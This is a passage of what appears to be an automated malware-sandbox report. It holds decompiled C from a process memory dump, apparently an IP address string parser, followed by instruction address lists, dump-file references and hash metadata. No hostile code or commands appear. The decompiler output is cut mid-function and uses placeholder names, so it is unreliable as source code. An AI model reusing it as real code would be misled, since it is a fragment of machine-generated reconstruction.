						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E020EEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E020EEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E020E685D(_t167, 4) == 0) {
								if(E020E685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E020E685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E020E685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E020C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E020BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E020EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E020EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                    0x020efcd1
                    0x020efcd6
                    0x020efcd9
                    0x020efcdc
                    0x020efcdf
                    0x020efce2
                    0x020efce5
                    0x020efce8
                    0x020efceb
                    0x020efced
                    0x020efced
                    0x020efcf3
                    0x00000000
                    0x00000000
                    0x020efcfc
                    0x020efcfe
                    0x020efdc1
                    0x0211ecbd
                    0x00000000
                    0x0211eccc
                    0x0211eccc
                    0x0211ecd2
                    0x00000000
                    0x00000000
                    0x0211ecdf
                    0x0211ece0
                    0x0211ece4
                    0x0211eceb
                    0x0211ecee
                    0x0211eca8
                    0x0211eca8
                    0x0211ecaa
                    0x020efd76
                    0x020efd79
                    0x020efdb4
                    0x020efdb5
                    0x020efdb6
                    0x00000000
                    0x020efdb6
                    0x020efd7e
                    0x0211ecfc
                    0x020efe2f
                    0x00000000
                    0x020efe2f
                    0x0211ed08
                    0x0211ed0f
                    0x0211ed17
                    0x0211ed1b
                    0x00000000
                    0x0211ed1b
                    0x020efd88
                    0x00000000
                    0x00000000
                    0x020efd94
                    0x020efd99
                    0x020efda1
                    0x00000000
                    0x00000000
                    0x020efdb0
                    0x00000000
                    0x020efdb0
                    0x0211ecbd
                    0x020efdc7
                    0x020efdcb
                    0x00000000
                    0x020efdd7
                    0x020efde3
                    0x020efe06
                    0x02101fe7
                    0x00000000
                    0x00000000
                    0x02101fef
                    0x02101ff0
                    0x02101ff4
                    0x02101ff7
                    0x02101ffa
                    0x02101ffd
                    0x02102000
                    0x00000000
                    0x00000000
                    0x0211ecf1
                    0x00000000
                    0x0211ecf1
                    0x00000000
                    0x020efe06
                    0x020efde8
                    0x020efdec
                    0x020efdef
                    0x020efdf2
                    0x00000000
                    0x020efdf2
                    0x020efdcb
                    0x020efd04
                    0x020efd05
                    0x0211ec67
                    0x00000000
                    0x00000000
                    0x0211ec6f
                    0x00000000
                    0x0211ec6f
                    0x020efd13
                    0x020efd3c
                    0x020efd40
                    0x0211ec75
                    0x0211ec7a
                    0x00000000
                    0x0211ec8a
                    0x0211ec8a
                    0x0211ec90
                    0x0211ecb2
                    0x020efd73
                    0x020efd73
                    0x00000000
                    0x020efd73
                    0x0211ec95
                    0x00000000
                    0x00000000
                    0x0211eca1
                    0x0211eca4
                    0x0211eca5
                    0x00000000
                    0x0211eca5
                    0x0211ec7a
                    0x020efd4a
                    0x00000000
                    0x020efd6e
                    0x020efd6e
                    0x020efd71
                    0x00000000
                    0x020efd71
                    0x020efd4a
                    0x020efd21
                    0x020fa3a1
                    0x00000000
                    0x020fa3a1
                    0x020efd36
                    0x0210200b
                    0x02102012
                    0x00000000
                    0x00000000
                    0x02102018
                    0x00000000
                    0x02102018
                    0x00000000
                    0x020efd36
                    0x020efe0f
                    0x020efe16
                    0x020fa3ad
                    0x00000000
                    0x00000000
                    0x020fa3b3
                    0x020fa3b3
                    0x020efe1f
                    0x0211ed25
                    0x0211ed86
                    0x00000000
                    0x00000000
                    0x0211ed91
                    0x0211ed95
                    0x0211ed95
                    0x0211ed9a
                    0x0211edad
                    0x0211edb3
                    0x0211edba
                    0x0211edc4
                    0x0211edc9
                    0x00000000
                    0x0211edcc
                    0x0211ed2a
                    0x0211ed55
                    0x00000000
                    0x00000000
                    0x0211ed61
                    0x0211ed66
                    0x0211ed6e
                    0x00000000
                    0x00000000
                    0x0211ed7d
                    0x00000000
                    0x0211ed7d
                    0x0211ed30
                    0x00000000
                    0x00000000
                    0x0211ed3c
                    0x0211ed43
                    0x0211ed4b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: __fassign
                    • String ID:
                    • API String ID: 3965848254-0
                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                    • Instruction ID: 9a4ca070c0ed9bbcf2bba79b13e41de82560de5028b8313f6a6d13296ce437e2
                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                    • Instruction Fuzzy Hash: A391B031D0030AEEDF25DF98C8497EEBBB5EF45318F20807AD816A7691E7705A81DB81
                    Uniqueness

                    Uniqueness Score: -1.00%